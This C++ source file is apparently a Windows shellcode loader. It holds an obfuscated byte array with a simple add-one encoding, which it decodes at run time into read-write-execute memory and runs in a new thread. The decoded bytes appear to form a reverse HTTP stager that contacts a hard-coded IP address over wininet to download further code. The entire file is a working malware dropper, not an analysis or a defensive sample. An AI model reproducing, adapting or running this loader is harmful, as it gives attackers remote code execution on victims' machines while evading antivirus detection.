#include <iostream>
#include <windows.h>

int main() {
    
    void* exec;
    HANDLE thread;
    unsigned int shit_len;
    int offset;
    int i;

    unsigned char shit[] =
        "\xfd\x49\x84\xe5\xf1\xe9\xcd\x01\x01\x01\x42\x52\x42\x51\x53"
        "\x49\x32\xd3\x52\x66\x49\x8c\x53\x61\x49\x8c\x53\x19\x49\x8c"
        "\x53\x21\x57\x49\x10\xb8\x4b\x4b\x49\x8c\x73\x51\x4e\x32\xca"
        "\x49\x32\xc1\xad\x3d\x62\x7d\x03\x2d\x21\x42\xc2\xca\x0e\x42"
        "\x02\xc2\xe3\xee\x53\x49\x8c\x53\x21\x8c\x43\x3d\x49\x02\xd1"
        "\x42\x52\x67\x82\x79\x19\x0c\x03\x10\x86\x73\x01\x01\x01\x8c"
        "\x81\x89\x01\x01\x01\x49\x86\xc1\x75\x68\x49\x02\xd1\x51\x8c"
        "\x49\x19\x45\x8c\x41\x21\x4a\x02\xd1\xe4\x57\x49\x00\xca\x42"
        "\x8c\x35\x89\x49\x02\xd7\x4e\x32\xca\x49\x32\xc1\xad\x42\xc2"
        "\xca\x0e\x42\x02\xc2\x39\xe1\x76\xf2\x4d\x04\x4d\x25\x09\x46"
        "\x3a\xd2\x76\xd9\x59\x45\x8c\x41\x25\x4a\x02\xd1\x67\x42\x8c"
        "\x0d\x49\x45\x8c\x41\x1d\x4a\x02\xd1\x42\x8c\x05\x89\x49\x02"
        "\xd1\x42\x59\x42\x59\x5f\x5a\x5b\x42\x59\x42\x5a\x42\x5b\x49"
        "\x84\xed\x21\x42\x53\x00\xe1\x59\x42\x5a\x5b\x49\x8c\x13\xea"
        "\x4c\x00\x00\x00\x5e\x49\x32\xdc\x54\x4a\xbf\x78\x6a\x6f\x6a"
        "\x6f\x66\x75\x01\x42\x57\x49\x8a\xe2\x4a\xc8\xc3\x4d\x78\x27"
        "\x08\x00\xd6\x54\x54\x49\x8a\xe2\x54\x5b\x4e\x32\xc1\x4e\x32"
        "\xca\x54\x54\x4a\xbb\x3b\x57\x7a\xa8\x01\x01\x01\x01\x00\xd6"
        "\xe9\x10\x01\x01\x01\x32\x31\x2f\x32\x31\x31\x2f\x33\x34\x3a"
        "\x2f\x32\x35\x34\x01\x5b\x49\x8a\xc2\x4a\xc8\xc1\xfc\x21\x01"
        "\x01\x4e\x32\xca\x54\x54\x6b\x04\x54\x4a\xbb\x58\x8a\xa0\xc7"
        "\x01\x01\x01\x01\x00\xd6\xe9\xf1\x01\x01\x01\x30\x79\x69\x6a"
        "\x7a\x57\x71\x35\x44\x74\x70\x36\x36\x60\x49\x6b\x2e\x48\x78"
        "\x5a\x51\x6b\x42\x70\x45\x39\x64\x32\x6e\x54\x36\x65\x6b\x64"
        "\x4d\x38\x73\x57\x49\x39\x7b\x54\x50\x4c\x6b\x60\x35\x57\x6e"
        "\x77\x59\x79\x4b\x4a\x43\x4b\x6e\x33\x54\x79\x2e\x77\x4e\x70"
        "\x62\x2e\x6d\x34\x73\x6b\x6d\x4d\x53\x3a\x74\x54\x6d\x32\x65"
        "\x69\x70\x6f\x35\x54\x49\x78\x62\x62\x43\x48\x4d\x54\x4a\x52"
        "\x43\x77\x68\x71\x56\x53\x55\x44\x67\x34\x59\x71\x4e\x70\x32"
        "\x6b\x6e\x4a\x6b\x42\x46\x73\x50\x68\x69\x46\x45\x4b\x78\x42"
        "\x43\x3a\x72\x5a\x71\x63\x52\x60\x45\x70\x75\x6e\x44\x33\x43"
        "\x37\x6c\x6a\x50\x47\x2e\x63\x4d\x36\x39\x71\x53\x38\x72\x31"
        "\x34\x6a\x67\x71\x34\x62\x31\x38\x71\x79\x4f\x76\x77\x60\x78"
        "\x54\x68\x37\x38\x4d\x59\x6e\x43\x58\x69\x65\x50\x6f\x4c\x4b"
        "\x44\x59\x60\x46\x68\x46\x59\x4b\x76\x62\x58\x73\x7b\x4c\x67"
        "\x69\x48\x31\x31\x6c\x4c\x79\x71\x7a\x7a\x49\x70\x54\x74\x33"
        "\x39\x35\x46\x4b\x78\x4c\x32\x60\x4e\x42\x74\x59\x67\x32\x4b"
        "\x33\x6b\x70\x4f\x54\x55\x52\x6f\x78\x4d\x01\x49\x8a\xc2\x54"
        "\x5b\x42\x59\x4e\x32\xca\x54\x49\xb9\x01\x03\x29\x85\x01\x01"
        "\x01\x01\x51\x54\x54\x4a\xc8\xc3\xec\x56\x2f\x3c\x00\xd6\x49"
        "\x8a\xc7\x6b\x0b\x60\x54\x5b\x49\x8a\xf2\x4e\x32\xca\x4e\x32"
        "\xca\x54\x54\x4a\xc8\xc3\x2e\x07\x19\x7c\x00\xd6\x86\xc1\x76"
        "\x20\x49\xc8\xc2\x89\x14\x01\x01\x4a\xbb\x45\xf1\x36\xe1\x01"
        "\x01\x01\x01\x00\xd6\x49\x00\xd0\x75\x03\xec\xcd\xe9\x56\x01"
        "\x01\x01\x54\x5a\x6b\x41\x5b\x4a\x8a\xd2\xc2\xe3\x11\x4a\xc8"
        "\xc1\x01\x11\x01\x01\x4a\xbb\x59\xa5\x54\xe6\x01\x01\x01\x01"
        "\x00\xd6\x49\x94\x54\x54\x49\x8a\xe8\x49\x8a\xf2\x49\x8a\xdb"
        "\x4a\xc8\xc1\x01\x21\x01\x01\x4a\x8a\xfa\x4a\xbb\x13\x97\x8a"
        "\xe3\x01\x01\x01\x01\x00\xd6\x49\x84\xc5\x21\x86\xc1\x75\xb3"
        "\x67\x8c\x08\x49\x02\xc4\x86\xc1\x76\xd3\x59\xc4\x59\x6b\x01"
        "\x5a\x4a\xc8\xc3\xf1\xb6\xa3\x57\x00\xd6";

    shit_len = sizeof(shit);

    // allocate
    exec = VirtualAlloc(0, shit_len, MEM_COMMIT | MEM_RESERVE, 0x40);
    
    // decrypt 
    offset = 1;
    i = 0;

    do {
        shit[i] = (int(shit[i]) - offset % 255);
        i++;
    } while (i < (sizeof(shit) - 1));

    RtlMoveMemory(exec, shit, shit_len);
    thread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);
    WaitForSingleObject(thread, -1);

}


